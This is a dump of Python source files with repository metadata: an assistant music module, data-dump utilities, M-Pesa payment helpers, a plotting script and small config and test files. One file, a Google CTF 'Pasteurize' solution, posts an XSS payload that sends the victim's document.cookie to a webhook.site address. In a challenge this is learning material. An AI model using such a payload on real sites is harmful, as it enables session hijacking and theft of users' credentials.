Dataset columns (name | dtype | observed range; ⌀ marks nullable columns):

hexsha | string | length 40
size | int64 | 5 to 2.06M
ext | string | 10 distinct values
lang | string | 1 distinct value (Python)
max_stars_repo_path | string | length 3 to 248
max_stars_repo_name | string | length 5 to 125
max_stars_repo_head_hexsha | string | length 40 to 78
max_stars_repo_licenses | list | length 1 to 10
max_stars_count | int64 ⌀ | 1 to 191k
max_stars_repo_stars_event_min_datetime | string ⌀ | length 24
max_stars_repo_stars_event_max_datetime | string ⌀ | length 24
max_issues_repo_path | string | length 3 to 248
max_issues_repo_name | string | length 5 to 125
max_issues_repo_head_hexsha | string | length 40 to 78
max_issues_repo_licenses | list | length 1 to 10
max_issues_count | int64 ⌀ | 1 to 67k
max_issues_repo_issues_event_min_datetime | string ⌀ | length 24
max_issues_repo_issues_event_max_datetime | string ⌀ | length 24
max_forks_repo_path | string | length 3 to 248
max_forks_repo_name | string | length 5 to 125
max_forks_repo_head_hexsha | string | length 40 to 78
max_forks_repo_licenses | list | length 1 to 10
max_forks_count | int64 ⌀ | 1 to 105k
max_forks_repo_forks_event_min_datetime | string ⌀ | length 24
max_forks_repo_forks_event_max_datetime | string ⌀ | length 24
content | string | length 5 to 2.06M
avg_line_length | float64 | 1 to 1.02M
max_line_length | int64 | 3 to 1.03M
alphanum_fraction | float64 | 0 to 1
count_classes | int64 | 0 to 1.6M
score_classes | float64 | 0 to 1
count_generators | int64 | 0 to 651k
score_generators | float64 | 0 to 1
count_decorators | int64 | 0 to 990k
score_decorators | float64 | 0 to 1
count_async_functions | int64 | 0 to 235k
score_async_functions | float64 | 0 to 1
count_documentation | int64 | 0 to 1.04M
score_documentation | float64 | 0 to 1
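Each record below lists its metadata fields, the raw file content, and the per-file statistics in the column order given above. As a quick illustration of how these columns can be used, here is a minimal sketch that filters rows with pandas; it assumes the rows are available locally as a Parquet file (the `samples.parquet` path and the threshold values are illustrative, not part of this dump):

```python
# Minimal sketch: load the rows and filter by the schema's columns.
# "samples.parquet" is a placeholder path, not taken from the dump above.
import pandas as pd

df = pd.read_parquet("samples.parquet")

# Keep Python files that are reasonably documented and come from repos with
# at least a few stars; max_stars_count is nullable, so fill nulls first.
subset = df[
    (df["lang"] == "Python")
    & (df["score_documentation"] >= 0.3)
    & (df["max_stars_count"].fillna(0) >= 5)
]

print(subset[["max_stars_repo_name", "max_stars_repo_path", "size", "score_documentation"]].head())
```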
hexsha: b0c74b2e81942f6fdda3626e4e0173d3f260b19b | size: 1,328 | ext: py | lang: Python
max_stars: client/query_modules/music_module.py | abhishekg785/hiro @ 950224d07797740b8840316bb412c1827eab46f0 | licenses: ["MIT"] | count: 7 | events: 2017-04-12T10:58:42.000Z to 2021-10-03T18:07:29.000Z
max_issues: client/query_modules/music_module.py | abhishekg785/hiro @ 950224d07797740b8840316bb412c1827eab46f0 | licenses: ["MIT"] | count: null | events: null
max_forks: client/query_modules/music_module.py | abhishekg785/hiro @ 950224d07797740b8840316bb412c1827eab46f0 | licenses: ["MIT"] | count: 5 | events: 2017-07-06T12:28:10.000Z to 2020-01-07T19:45:25.000Z
content:
# simply handles the reply for hello by the user
import re
import random
import os
import sys
import webbrowser
from random import randint
# getting the watson api functions here
PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(PATH)
MUSIC_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) + '/music/'
# print MUSIC_PATH
from watson import WatsonAPI
watson = WatsonAPI()
# take necessary actions
def handle(text, audio):
print 'Handling music module'
""" fetch the text and get the emotion of the user
go to the corresponding music dir and fetch the music
play the music dud :)
"""
tone = str(watson.tone_analyzer_api(text))
music_list = os.listdir(MUSIC_PATH + tone + '/')
music_list_len = len(music_list)
if music_list_len > 0:
audio.speak('You seem to be ' + tone + '.I am playing a song for you!')
random_index = randint(0, music_list_len - 1)
print random_index
webbrowser.open(MUSIC_PATH + tone + '/' + music_list[random_index])
else:
audio.speak('No music found')
# validate the module for the text from the source ( user, server, bot etc )
def isValid(text):
return bool(re.search(r'\bmusic|melod|song|songs|tune\b', text, re.IGNORECASE))
avg_line_length: 30.181818 | max_line_length: 110 | alphanum_fraction: 0.709337
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 483 (score 0.363705)
hexsha: b0c77869671d10fbedbed340a7a7c9b4e8912459 | size: 2,993 | ext: py | lang: Python
max_stars: ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet @ e5aab856fbb833d34c4d56831cad7c09d7719a5e | licenses: ["Apache-2.0"] | count: null | events: null
max_issues: ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet @ e5aab856fbb833d34c4d56831cad7c09d7719a5e | licenses: ["Apache-2.0"] | count: 6 | events: 2019-12-26T16:43:14.000Z to 2022-03-21T22:16:25.000Z
max_forks: ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet @ e5aab856fbb833d34c4d56831cad7c09d7719a5e | licenses: ["Apache-2.0"] | count: 1 | events: 2018-07-27T16:19:27.000Z to 2018-07-27T16:19:27.000Z
content:
""" utils.py - helper functions """
import logging
import functools
import operator
from repoze.lru import lru_cache
from gevent import spawn
from gevent.subprocess import Popen, PIPE
try:
import boto3
except ImportError:
boto3 = None
def dump(app, logger):
"""
Run dump script as separate process
"""
def read_stream(stream):
try:
while not stream.closed:
line = stream.readline()
if not line:
break
line = line.rstrip().decode('utf-8')
logger.info(line.split(' - ')[-1])
except:
pass
args = prepare_pack_command(app.config)
logger.warn("Going to start dump with args {}".format(args))
popen = Popen(args, stdout=PIPE, stderr=PIPE)
spawn(read_stream, popen.stdout)
spawn(read_stream, popen.stderr)
popen.wait()
return_code = popen.returncode
logger.info("Dumper ended work with code {}".format(return_code))
def setup_logger(
logger,
handler,
level,
formatter,
filename):
if filename:
handler = functools.partial(handler, filename)
handler = handler()
if formatter:
handler.setFormatter(logging.Formatter(formatter))
logger.addHandler(handler)
logger.setLevel(getattr(logging, level.upper()))
return logger
def find_package_date(releases):
""" Find max date inside package """
return max(
releases,
key=operator.itemgetter('date')
).get('date')
def prepare_package(date, metainfo=None):
""" Prepare metainfo for package """
base = {
'publishedDate': date,
'releases': [],
'publisher': {
'name': '',
'scheme': '',
'uri': ''
},
}
if metainfo:
base.update(metainfo)
return base
@lru_cache(maxsize=1)
def connect_bucket(cfg):
""" TODO: do we really need this? """
return (
cfg.bucket,
boto3.client('s3')
)
def prepare_pack_command(cfg):
base_bin = cfg.get('bin_path', 'ocds-pack')
base_args = [
base_bin,
'--package-meta',
cfg.get('dump', {}).get('metainfo_file', 'meta.yml')
]
for key in ('clean_up', 'with_zip', 'count'):
if cfg.get('dump', {}).get(key):
base_args.extend([
'--{}'.format(key.replace('_', '-')),
str(cfg['dump'][key])
])
db_args = [
item
for arg, value in cfg.get('db').items()
for item in '--{} {}'.format(arg.replace('_', '-'), value).split()
]
backend = list(cfg.get('backend', {'fs': ''}).keys())[0]
backend_args = [backend]
backend_args.extend([
item
for arg, value in cfg['backend'][backend].items()
for item in '--{} {}'.format(arg.replace('_', '-'), value).split()
])
for args in db_args, backend_args:
base_args.extend(args)
return base_args
avg_line_length: 25.364407 | max_line_length: 74 | alphanum_fraction: 0.559973
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 158 (score 0.05279) | count_async_functions: 0 (score 0) | count_documentation: 527 (score 0.176078)
hexsha: b0c81b1e5cf0bc462adf9bdbb74fbefc166b797e | size: 264 | ext: py | lang: Python
max_stars: apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab @ 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | licenses: ["Apache-2.0"] | count: null | events: null
max_issues: apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab @ 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | licenses: ["Apache-2.0"] | count: null | events: null
max_forks: apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab @ 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | licenses: ["Apache-2.0"] | count: null | events: null
content:
import colorlog
handler = colorlog.StreamHandler()
handler.setFormatter(
colorlog.ColoredFormatter(
"%(log_color)s%(levelname)s:%(name)s:%(filename)s:%(funcName)s: %(message)s"
)
)
logger = colorlog.getLogger(__name__)
logger.addHandler(handler)
avg_line_length: 22 | max_line_length: 84 | alphanum_fraction: 0.719697
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 76 (score 0.287879)
hexsha: b0c97b770b216db5c6e4a8a50cbc39cc9f11e3a2 | size: 1,467 | ext: py | lang: Python
max_stars: venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator @ 55685dd7c968861f18ae0701129f5af2bc682d67 | licenses: ["MIT"] | count: null | events: null
max_issues: venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator @ 55685dd7c968861f18ae0701129f5af2bc682d67 | licenses: ["MIT"] | count: 7 | events: 2021-02-08T20:22:15.000Z to 2022-03-11T23:19:41.000Z
max_forks: venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator @ 55685dd7c968861f18ae0701129f5af2bc682d67 | licenses: ["MIT"] | count: null | events: null
content:
# -*- coding: utf-8 -*-
# daemon/pidfile.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright © 2008–2010 Ben Finney <ben+python@benfinney.id.au>
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Lockfile behaviour implemented via Unix PID files.
"""
from __future__ import absolute_import
from lockfile.pidlockfile import PIDLockFile
class TimeoutPIDLockFile(PIDLockFile, object):
""" Lockfile with default timeout, implemented as a Unix PID file.
This uses the ``PIDLockFile`` implementation, with the
following changes:
* The `acquire_timeout` parameter to the initialiser will be
used as the default `timeout` parameter for the `acquire`
method.
"""
def __init__(self, path, acquire_timeout=None, *args, **kwargs):
""" Set up the parameters of a TimeoutPIDLockFile. """
self.acquire_timeout = acquire_timeout
super(TimeoutPIDLockFile, self).__init__(path, *args, **kwargs)
def acquire(self, timeout=None, *args, **kwargs):
""" Acquire the lock. """
if timeout is None:
timeout = self.acquire_timeout
super(TimeoutPIDLockFile, self).acquire(timeout, *args, **kwargs)
avg_line_length: 34.116279 | max_line_length: 75 | alphanum_fraction: 0.691888
count_classes: 863 (score 0.587075) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 909 (score 0.618367)
hexsha: b0c9cd685e3c553d9d38e5a73ed8bdcbc7f01131 | size: 11,258 | ext: py | lang: Python
max_stars: zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking @ 0a2dac42235adcac3cf8c114961e407f54844223 | licenses: ["Apache-2.0"] | count: null | events: null
max_issues: zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking @ 0a2dac42235adcac3cf8c114961e407f54844223 | licenses: ["Apache-2.0"] | count: 1 | events: 2021-08-20T06:41:57.000Z to 2021-08-20T06:41:57.000Z
max_forks: zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking @ 0a2dac42235adcac3cf8c114961e407f54844223 | licenses: ["Apache-2.0"] | count: null | events: null
content:
import logging
from django.db import transaction as db_transaction
from django.conf import settings
from django.utils import timezone
from django.urls import reverse_lazy
from zazi.core.utils import get_absolute_url, get_encrypted_text
from .. import api
from ..models import (
MpesaAccount,
MpesaAccountBalance,
MpesaAccountRegisteredURL,
MpesaAPIAccount,
MpesaTransaction,
generate_id)
from ..enums import IdentifierType, CommandID, ResultCode, MpesaTransactionStatus
logger = logging.getLogger(__name__)
def get_mpesa_webhook_url(url_name, kwargs=None, endpoint=None):
logger.debug(f'get_mpesa_webhook_url({url_name}, kwargs={kwargs}, endpoint={endpoint})')
return get_absolute_url(url_name, kwargs=kwargs, endpoint=settings.MPESA_PROXY_URL)
def request_b2b_transaction(
sender_short_code,
receiver_short_code,
amount,
user,
mpesa_receipt_number=None,
account_reference=None,
transaction_category=None,
command_id=CommandID.B2B_BUSINESS_TO_BUSINESS_TRANSFER,
remarks=None,
):
with db_transaction.atomic():
sender_account = MpesaAPIAccount.objects.get(
organization__owner=user,
identifier=sender_short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
recipient_account = MpesaAPIAccount.objects.get(
organization__owner=user,
identifier=receiver_short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
return MpesaTransaction.objects.create(
transaction_id=generate_id(),
command_id=command_id,
mpesa_receipt_number=mpesa_receipt_number,
sender_account=sender_account,
recipient_account=recipient_account,
transaction_time=timezone.now(),
transaction_amount=amount)
def request_b2c_transaction(
organization_id,
sender_short_code,
receiver_phone_number,
amount,
user,
transaction_id=None,
account_reference=None,
transaction_category=None,
command_id=CommandID.B2C_BUSINESS_PAYMENT,
remarks=None,
):
logger.info("request_b2c_transaction %s %s %s %s" % (
organization_id,
sender_short_code,
receiver_phone_number,
amount
))
with db_transaction.atomic():
sender_account = MpesaAccount.objects.get(
organization__owner=user,
organization__organization_id=organization_id,
identifier=sender_short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
recipient_account = MpesaAccount.objects.get(
identifier=receiver_phone_number,
identifier_type=IdentifierType.PERSONAL_MPESA)
transaction_id = transaction_id or generate_id()
mpesa_api_account = sender_account.api_account
queue_timeout_url = get_mpesa_webhook_url('mpesa:mpesa_b2c_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": transaction_id
})
result_url = get_mpesa_webhook_url('mpesa:mpesa_b2c_result_url', kwargs={
"organization_id": organization_id,
"reference": transaction_id
})
security_credential = get_encrypted_text(
mpesa_api_account.security_credential,
function_name="zazi-certificate-microservice-dev-encrypt_text")
if not security_credential:
raise Exception("Error accessing securty credentials for M-Pesa account %s" % mpesa_api_account.account_id)
else:
logger.info("Security credential received for %s" % sender_account.account_id)
request_payload = api.b2c_transact(
env="production" if sender_account.api_account.in_production else "sandbox",
app_key=mpesa_api_account.consumer_key,
app_secret=mpesa_api_account.consumer_secret,
initiator_name=mpesa_api_account.username,
security_credential=security_credential,
command_id=command_id,
party_a=sender_account.identifier,
party_b=recipient_account.identifier,
amount=amount,
remarks=remarks,
account_reference=account_reference,
queue_timeout_url=queue_timeout_url,
result_url=result_url)
transaction = MpesaTransaction.objects\
.create(
command_id=command_id,
transaction_category=transaction_category,
transaction_id=transaction_id,
sender_account=sender_account,
result_code=ResultCode.success,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
recipient_account=recipient_account)
if request_payload:
logger.info(request_payload)
transaction.request_payload = {
"conversation_id": request_payload["ConversationID"],
"originator_conversation_id": request_payload["OriginatorConversationID"],
"response_code": ResultCode(int(request_payload["ResponseCode"])),
"response_description": request_payload["ResponseDescription"]
}
transaction.save()
else:
transaction.request_payload = request_payload
transaction.save()
return transaction
def request_mpesa_express_stk_push(
organization_id,
short_code,
phone_number,
amount,
transaction_category=None,
reference_code=None,
description=None,
):
with db_transaction.atomic():
business_account = MpesaAccount.objects.get(
organization__organization_id=organization_id,
identifier=short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
personal_account = MpesaAccount.objects.get(
identifier=phone_number,
identifier_type=IdentifierType.PERSONAL_MPESA)
lipa_na_mpesa_account = business_account.lipa_na_mpesa_accounts.first()
reference = generate_id()
request_payload = api.mpesa_express_stk_push(
env="production" if business_account.api_account.in_production else "sandbox",
app_key=business_account.api_account.consumer_key,
app_secret=business_account.api_account.consumer_secret,
business_shortcode=short_code,
passcode=lipa_na_mpesa_account.pass_code,
amount=amount,
callback_url=get_mpesa_webhook_url('mpesa:mpesa_c2b_stk_push_callback_url', kwargs={
"organization_id": organization_id,
"reference": reference
}),
reference_code=reference_code or reference,
phone_number=phone_number,
description=description)
transaction = MpesaTransaction.objects.create(
transaction_id=reference,
command_id=CommandID.C2B_PAYBILL,
transaction_category=transaction_category,
sender_account=personal_account,
recipient_account=business_account,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
transaction_amount=amount,
request_payload=request_payload)
if request_payload.get("errorCode") is None:
transaction.request_payload = {
"merchant_request_id": request_payload["MerchantRequestID"],
"checkout_request_id": request_payload["CheckoutRequestID"],
"response_code": ResultCode(int(request_payload["ResponseCode"])),
"response_description": request_payload["ResponseDescription"],
"customer_message": request_payload["CustomerMessage"]
}
transaction.save()
else:
transaction.request_payload = request_payload
transaction.save()
logger.debug(request_payload)
return transaction
def request_transaction_reverse(
transaction_id,
mpesa_user,
remarks=None,
occassion=None
):
with db_transaction.atomic():
organization_id = mpesa_user.organization.organization_id
transaction = MpesaTransaction.objects.get(
transaction_id=transaction_id)
response = api.transaction_reverse(
env="production" if transaction.sender_account.in_production else "sandbox",
app_key=None,
app_secret=None,
receiver_party=None,
initiator=None,
security_credential=None,
command_id=None,
transaction_id=None,
receiver_identifier_type=None,
amount=None,
result_url=get_mpesa_webhook_url('mpesa_balance_check_result_url', kwargs={
"organization_id": organization_id,
"reference": transaction.transaction_id
}),
queue_timeout_url=get_mpesa_webhook_url('mpesa_balance_check_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": transaction.transaction_id
}),
remarks=remarks,
occassion=occassion)
transaction_reference = generate_id()
return MpesaTransaction.objects.create(
command_id=CommandID.UTILITY_TRANSACTION_REVERSAL,
transaction_id=transaction_reference,
initiator=mpesa_user,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
request_payload=response)
def request_check_transaction_status(
transaction_id,
mpesa_user,
remarks=None
):
with db_transaction.atomic():
organization_id = mpesa_user.organization.organization_id
transaction = MpesaTransaction.objects.get(
transaction_id=transaction_id)
response = api.check_transaction_status(
env="production" if transaction.sender_account.in_production else "sandbox",
app_key=transaction.api_account.consumer_key,
app_secret=transaction.api_account.consumer_secret,
identifier_type=transaction.sender_account.identifier_type,
initiator=transaction.initiator.username,
party_a=transaction.sender_account.identifier,
remarks=remarks,
result_url=get_mpesa_webhook_url('mpesa_check_status_result_url', kwargs={
"organization_id": organization_id,
"reference": transaction.mpesa_receipt_number
}),
queue_timeout_url=get_mpesa_webhook_url('mpesa_check_status_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": transaction.mpesa_receipt_number
}))
transaction_reference = generate_id()
return MpesaTransaction.objects.create(
command_id=CommandID.UTILITY_TRANSACTION_STATUS_QUERY,
transaction_id=transaction_reference,
initiator=mpesa_user,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
request_payload=response)
avg_line_length: 38.162712 | max_line_length: 119 | alphanum_fraction: 0.669213
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 1,134 (score 0.100728)
hexsha: b0cb0c2e438281324253c5fc9aef08d9586a6478 | size: 297 | ext: py | lang: Python
max_stars: gCTF/gctf20/Pasteurize/asd.py | shagunattri/ctfwriteups @ 02654f9feeef43aa28c321a7bd9c13a39be8f137 | licenses: ["MIT"] | count: 1 | events: 2020-06-11T18:04:22.000Z to 2020-06-11T18:04:22.000Z
max_issues: gCTF/gctf20/Pasteurize/asd.py | shagunattri/MemeBoard @ 02654f9feeef43aa28c321a7bd9c13a39be8f137 | licenses: ["MIT"] | count: 1 | events: 2021-03-22T09:51:13.000Z to 2021-03-22T09:51:13.000Z
max_forks: gCTF/gctf20/Pasteurize/asd.py | shagunattri/MemeBoard @ 02654f9feeef43aa28c321a7bd9c13a39be8f137 | licenses: ["MIT"] | count: null | events: null
content:
#!/usr/bin/env python3
#JOHN Hammond method result
import requests
url = "https://pasteurize.web.ctfcompetition.com/"
req = requests.post(url,data = {
"content[]": ";new Image().src='https://webhook.site/8db05257-6ad1-44a9-979a-574c1caca5d6?asdf='+document.cookie//"
})
print(req.text)
avg_line_length: 18.5625 | max_line_length: 119 | alphanum_fraction: 0.703704
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 206 (score 0.693603)
hexsha: b0cb84a469618ec441c72fc62b1918615cc6f4ec | size: 7,437 | ext: py | lang: Python
max_stars: src/test/py/ltprg/results/plot.py | forkunited/ltprg @ 4e40d3571d229023df0f845c68643024e04bc202 | licenses: ["MIT"] | count: 11 | events: 2017-08-03T15:42:19.000Z to 2021-02-04T12:43:35.000Z
max_issues: src/test/py/ltprg/results/plot.py | forkunited/ltprg @ 4e40d3571d229023df0f845c68643024e04bc202 | licenses: ["MIT"] | count: null | events: null
max_forks: src/test/py/ltprg/results/plot.py | forkunited/ltprg @ 4e40d3571d229023df0f845c68643024e04bc202 | licenses: ["MIT"] | count: 1 | events: 2021-02-04T12:43:37.000Z to 2021-02-04T12:43:37.000Z
content:
#!/usr/bin/python
#
# Usage: plot.py [input_file] [xlabel] [ylabel] [x] [y] [where] [where_values] [groupby]
#
# input_file: Input tsv file where the first row contains column names
# xlabel: Label for plot horizontal axis
# ylabel: Label for plot vertical axis
# x: Name of column to plot on horizontal axis
# y: Name of column to plot on vertical axis
# where: Comma-separated list of columns for which to constrain the values contained in the plot
# where_values: Comma-separated list of values by which to constrain the columns given in [where]
# groupby: Comma-separated list of columns on which to group the data into separate curves
#
# The script will generate a 2-dimensional plot containing a set of curves. Values are averaged
# across rows of data that fit the constraints given in [where] and [where_values]. The averages
# are computed for separate curves determined by the [groupby]
#
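# Example invocation (hypothetical file and column names, shown only to make
# the argument order documented above concrete):
#   python plot.py results.tsv Iteration Accuracy iteration accuracy model,lr cnn,0.01 seed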
import csv
import sys
import numpy as np
from scipy import stats
from random import randint
input_file = sys.argv[1]
xlabel = sys.argv[2]
ylabel = sys.argv[3]
x = sys.argv[4]
y = sys.argv[5]
where = None
where_values = None
if len(sys.argv) > 6 and sys.argv[6] != 'None' and sys.argv[7] != 'None':
where = sys.argv[6].split(",")
where_values = sys.argv[7].split(",")
groupby = None
if len(sys.argv) > 8:
groupby = sys.argv[8].split(",")
make_table = False
if len(sys.argv) > 9:
make_table = (sys.argv[9] == "True")
def read_tsv_file(file_path):
f = open(file_path, 'rt')
rows = []
try:
reader = csv.DictReader(f, delimiter='\t')
for row in reader:
rows.append(row)
finally:
f.close()
return rows
def row_match(row, where, where_values):
if where is None:
return True
for i in range(len(where)):
if row[where[i]] != where_values[i]:
return False
return True
# Map [groupby],x -> y value list filtered by 'where'
def aggregate(rows, x, y, where, where_values, groupby):
agg = dict()
for row in rows:
if not row_match(row, where, where_values):
continue
cur_agg = agg
if groupby is not None:
for key in groupby:
if row[key] not in cur_agg:
cur_agg[row[key]] = dict()
cur_agg = cur_agg[row[key]]
x_value = row[x]
y_value = row[y]
if x_value not in cur_agg:
cur_agg[x_value] = []
cur_agg[x_value].append(float(y_value))
return agg
def compute_statistics_helper(agg, agg_depth, keys, statistics, overall_statistics):
if agg_depth == 0:
cur_stats = statistics
for key in keys:
if key not in cur_stats:
cur_stats[key] = dict()
cur_stats = cur_stats[key]
cur_stats["mu"] = np.mean(agg)
cur_stats["stderr"] = stats.sem(agg)
cur_stats["max"] = max(agg)
overall_statistics["y_max"] = max(overall_statistics["y_max"], cur_stats["mu"])
if len(keys[len(keys) - 1]) != 0:
try:
overall_statistics["x_max"] = max(overall_statistics["x_max"], float(keys[len(keys) - 1]))
except ValueError:
pass
else:
for key in agg:
keys.append(key)
compute_statistics_helper(agg[key], agg_depth - 1, keys, statistics, overall_statistics)
keys.pop()
return statistics, overall_statistics
def compute_statistics(agg, groupby):
overall_statistics = dict()
overall_statistics["y_max"] = 1.0
overall_statistics["x_max"] = 0
statistics = dict()
depth = 1
if groupby is not None:
depth = len(groupby) + 1
return compute_statistics_helper(agg, depth, [], statistics, overall_statistics)
def make_latex_plot_helper(statistics, groupby, depth, keys, s):
if depth == 0:
plot_str = "\\addplot[color=black!" + str(randint(30,100)) + ",dash pattern=on " + str(randint(1,3)) + "pt off " + str(randint(1,2)) + "pt,error bars/.cd, y dir=both,y explicit] coordinates {\n"
x_values = [float(x_value) for x_value in statistics.keys()]
x_values.sort()
for x_value in x_values:
x_str = str(int(x_value))
plot_str = plot_str + "(" + x_str + "," + str(statistics[x_str]["mu"]) + ")+-(0.0," + str(statistics[x_str]["stderr"]) + ")\n"
plot_str = plot_str + "};\n"
plot_str = plot_str + "\\addlegendentry{\\tiny{"
if groupby is not None:
for i in range(len(groupby)):
plot_str = plot_str + groupby[i] + "=" + keys[i] + " "
plot_str = plot_str.strip()
plot_str = plot_str + "}};\n\n"
return s + plot_str
else:
for key in statistics:
keys.append(key)
s = make_latex_plot_helper(statistics[key], groupby, depth - 1, keys, s)
keys.pop()
return s
def make_latex_plot(statistics, overall_statistics, xlabel, ylabel, groupby):
s = ("\\begin{figure*}[ht]\n"
"\\begin{center}\n"
"\\begin{tikzpicture}\n"
"\\begin{axis}[%\n"
"width=.5\\textwidth,height=.5\\textwidth,\n"
"anchor=origin, % Shift the axis so its origin is at (0,0)\n"
"ymin=0,ymax=" + str(overall_statistics["y_max"]) + ",xmin=0,xmax=" + str(overall_statistics["x_max"]) + ",%\n"
"xlabel=" + xlabel + ",\n"
"ylabel=" + ylabel + ",\n"
"legend pos=outer north east\n"
"]\n"
)
depth = 0
if groupby is not None:
depth = len(groupby)
s = s + make_latex_plot_helper(statistics, groupby, depth, [], "")
s = s + ("\\end{axis}\n"
"\\end{tikzpicture}\n"
"\\end{center}\n"
"\\end{figure*}\n"
)
return s
def make_aggregate_table_helper(statistics, groupby, depth, keys, s):
if depth == 0:
try:
x_values = [float(x_value) if len(x_value) != 0 else "" for x_value in statistics.keys()]
except ValueError:
x_values = [x_value for x_value in statistics.keys()]
x_values.sort()
for x_value in x_values:
x_str = str(x_value)
for key in keys:
s += key + "\t"
if x_str not in statistics:
x_str = str(int(float(x_str))) # FIXME Stupid hack for now
s += x_str + "\t" + str(statistics[x_str]["mu"]) + "\t" + str(statistics[x_str]["stderr"]) + "\t" + str(statistics[x_str]["max"]) + "\n"
return s
else:
for key in statistics:
keys.append(key)
s = make_aggregate_table_helper(statistics[key], groupby, depth - 1, keys, s)
keys.pop()
return s
def make_aggregate_table(statistics, overall_statistics, xlabel, ylabel, groupby):
s = "\t".join(groupby) + "\t" + xlabel + "\t" + ylabel + "\t" + ylabel + " (stderr)" + "\t" + ylabel + " (max)\n"
depth = 0
if groupby is not None:
depth = len(groupby)
s = s + make_aggregate_table_helper(statistics, groupby, depth, [], "")
return s
rows = read_tsv_file(input_file)
agg = aggregate(rows, x, y, where, where_values, groupby)
statistics, overall_statistics = compute_statistics(agg, groupby)
if make_table:
print(make_aggregate_table(statistics, overall_statistics, xlabel, ylabel, groupby))
else:
print(make_latex_plot(statistics, overall_statistics, xlabel, ylabel, groupby))
avg_line_length: 33.804545 | max_line_length: 202 | alphanum_fraction: 0.600376
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 1,715 (score 0.230604)
hexsha: b0cb8d6fd396de4dcda21996632c248c8e21dab4 | size: 320 | ext: py | lang: Python
max_stars: version.py | ERICMIAO0817/knlp @ 56052e49be87d604839d8f81a7295c73a5ac62cf | licenses: ["MIT"] | count: 19 | events: 2021-03-17T02:15:18.000Z to 2021-12-14T04:46:21.000Z
max_issues: version.py | ERICMIAO0817/knlp @ 56052e49be87d604839d8f81a7295c73a5ac62cf | licenses: ["MIT"] | count: 4 | events: 2022-03-08T16:28:18.000Z to 2022-03-28T15:11:11.000Z
max_forks: version.py | ERICMIAO0817/knlp @ 56052e49be87d604839d8f81a7295c73a5ac62cf | licenses: ["MIT"] | count: 7 | events: 2021-03-17T02:15:23.000Z to 2022-03-17T15:41:04.000Z
content:
#!/usr/bin/python
# -*- coding:UTF-8 -*-
# -----------------------------------------------------------------------#
# File Name: version.py
# Author: Junyi Li
# Mail: 4ljy@163.com
# Created Time: 2021-01-27
# Description:
# -----------------------------------------------------------------------#
__version__ = "0.2.2"
avg_line_length: 26.666667 | max_line_length: 74 | alphanum_fraction: 0.34375
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 295 (score 0.921875)
hexsha: b0ccf531cfab6c9c4a503a8b46e7c6adcacdc203 | size: 1,336 | ext: py | lang: Python
max_stars: tests/base.py | abdghani995/docker-falcon @ 6e552a23c3dcc7210083cbe049a7ffbd13a888b1 | licenses: ["MIT"] | count: 19 | events: 2019-12-14T20:21:03.000Z to 2021-08-11T07:38:42.000Z
max_issues: tests/base.py | abdghani995/docker-falcon @ 6e552a23c3dcc7210083cbe049a7ffbd13a888b1 | licenses: ["MIT"] | count: 2 | events: 2018-05-14T23:05:11.000Z to 2021-11-21T19:32:08.000Z
max_forks: tests/base.py | vvitsenets/VICTORIA @ 843ad6cc1ecec8b0fb424263de37691454cd2b4e | licenses: ["MIT"] | count: 4 | events: 2019-12-15T05:59:57.000Z to 2022-03-05T08:03:04.000Z
content:
import unittest
import falcon
import falcon.testing
import app.util.json as json
from app import create_app
class TestBase(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.srmock = falcon.testing.StartResponseMock()
def simulate_request(self, path, *args, **kwargs):
env = falcon.testing.create_environ(path, *args, **kwargs)
resp = self.app(env, self.srmock)
if len(resp) >= 1:
return json.loads(resp[0].decode("utf-8"))
return resp
def simulate_get(self, *args, **kwargs):
kwargs["method"] = "GET"
return self.simulate_request(*args, **kwargs)
